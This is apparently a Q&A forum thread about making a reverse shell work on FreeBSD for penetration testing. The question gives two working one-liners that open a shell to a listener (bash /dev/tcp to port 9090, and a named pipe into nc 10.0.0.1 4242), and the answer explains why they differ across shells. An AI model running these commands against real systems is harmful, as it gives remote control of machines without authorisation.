-1

I’ve been experimenting with penetration testing recently, and I need to use reverse shell techniques for testing. I’ve previously used reverse shell on Ubuntu with the following command:

/bin/bash -i >& /dev/tcp/<Listener IP>/9090 0>&1

Now, I want to achieve the same on a FreeBSD system for testing purposes.

I found this website Reverse Shell Cheatsheet and saw the following command:

rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 4242 > /tmp/f

However, when I tried to implement it, I encountered an "Ambiguous output redirect" error. Initially, using nc <Listener IP> 9090 works successfully. Therefore, I’m looking for assistance to resolve this issue. Thank you!

Improve this question
2
  • Have you tried by installing the bash shell and using the same command as on Ubuntu? Also, error messages are usually preceded by the name of the utility that produced it. What is the complete unedited error message that you get from your pipeline?
    – Kusalananda
    Commented Jun 26 at 10:44
  • Thank you very much. Based on your suggestion, I switched my CLI to /usr/local/bin/bash and then executed /bin/sh -i >& /dev/tcp/<Listener IP>/9090 0>&1 in bash. This method indeed worked, but I would like to understand the reason behind it. Could you explain why this happens? I know that /bin/csh, /bin/sh, and /usr/local/bin/bash are different shells, but why does the command /bin/sh -i >& /dev/tcp/<Listener IP>/9090 0>&1 work in /usr/local/bin/bash but not in /bin/csh and /bin/sh? Additionally, is there any way to achieve a reverse shell in /bin/csh and /bin/sh?
    – HsingLI
    Commented Jun 27 at 5:22

1 Answer 1

Reset to default
0

You are confusing terminologies but more importantly: binaries.

You state in the comment that you understand the difference between the shells. But the important part is to understand that there are different implentatations (binaries). This goes for all the command line utilities you use as well. That is why the reverse shell cheatsheet has so many options so you can use the tools already installed on the system.

On FreeBSD the default sh shell is the Almquist shell. On Linux it depends on your distribution. You can read up on Difference between sh and Bash and What is the difference between ash and sh shell on Linux?

More importantly the /dev filesystem are not 100% 1:1 between Linux and FreeBSD. But your redirection using /dev/tcp is not even going through the filesystem as /dev/tcpis a bashism and only implemented in bash. See Different ways to use /dev/tcp/host/port command and where to find manual pages on this

So if you can use /dev/tcp with sh you are most likely using bash in sh mode.

Then you play around with netcat. But note there are different implementations here as well. FreeBSD has a default netcat but you might prefer to install GNU netcat which is commonly used on Linux. Then you can use familiar tools.

FreeBSD also by default comes with mkfifo and mknod which you attempt to use but fail to document how it fails.

On FreeBSD Perl is usually installed by default so that is a common route as well if you cannot install additional tools. Remember that the "reverse shell" is just an attempt to setup a TCP connection to a command-line using the tools already available on the box. This is mostly done to avoid common logs. If you do not care about that most boxes are using SSH and it is trivial to run a SSH reverse tunnel using the -R parameter.

Improve this answer
1
  • Thank you very much for your detailed response. After reading through the content, I have a general understanding. I will further review the details and reference links. I truly appreciate your help and reply.
    – HsingLI
    Commented Jun 28 at 3:43

You must log in to answer this question.

Not the answer you're looking for? Browse other questions tagged .